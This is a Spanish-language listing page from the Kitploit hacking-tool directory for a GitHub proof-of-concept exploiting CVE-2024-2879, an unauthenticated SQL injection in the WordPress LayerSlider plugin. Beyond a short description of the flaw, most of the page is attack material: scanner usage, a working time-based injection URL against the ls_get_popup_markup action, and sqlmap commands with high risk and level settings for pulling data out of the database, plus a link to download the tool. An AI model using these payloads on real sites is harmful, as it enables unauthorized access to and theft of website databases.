Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-2879 — Exploit de prueba de concepto para CVE-2024-2879: inyección SQL sin autenticación en el plugin LayerSlider de WordPress (7.9.11-7.10.0). Incluye script de escáner y guía de explotación con SQLMap para extraer información de la base de datos. | Kitploit
Herramientas/GitHubGitHub/herculeszxc/cve-2024-2879
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebSeguridad WebPruebas de Penetración
GitHubherculeszxc/cve-2024-2879

CVE-2024-2879

Exploit de prueba de concepto para CVE-2024-2879: inyección SQL sin autenticación en el plugin LayerSlider de WordPress (7.9.11-7.10.0). Incluye script de escáner y guía de explotación con SQLMap para extraer información de la base de datos.

Ver Repositorio
2231hace 2 añosRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2024-2879

Descripción

LayerSlider 7.9.11 - 7.10.0 - Inyección SQL no autenticada

El plugin LayerSlider para WordPress es vulnerable a la inyección SQL a través de la acción ls_get_popup_markup en las versiones 7.9.11 y 7.10.0 debido a un escape insuficiente del parámetro proporcionado por el usuario y a la falta de preparación suficiente en la consulta SQL existente. Esto permite que atacantes no autenticados añadan consultas SQL adicionales a las consultas ya existentes, que pueden utilizarse para extraer información sensible de la base de datos.

Uso del escáner

  1. Instala los requisitos: pip install -r requirements.txt
  2. python3 scan.py o <urllist.txt> image

Comprobación manual si el sitio web no está protegido con WAF

"http://site.com/wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and (SELECT 6416 FROM (SELECT(SLEEP(5)))nEiK)-- vqlq" Tiempo de respuesta con retraso de 5 segundos

image

Explotación con SQL Map

sqlmap "https:://site.com/wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=" --risk=3 --level=4 --dbms=mysql --technique=T o sqlmap -r request.txt --risk=3 --level=4 --dbms=mysql --technique=T

Descargar herramienta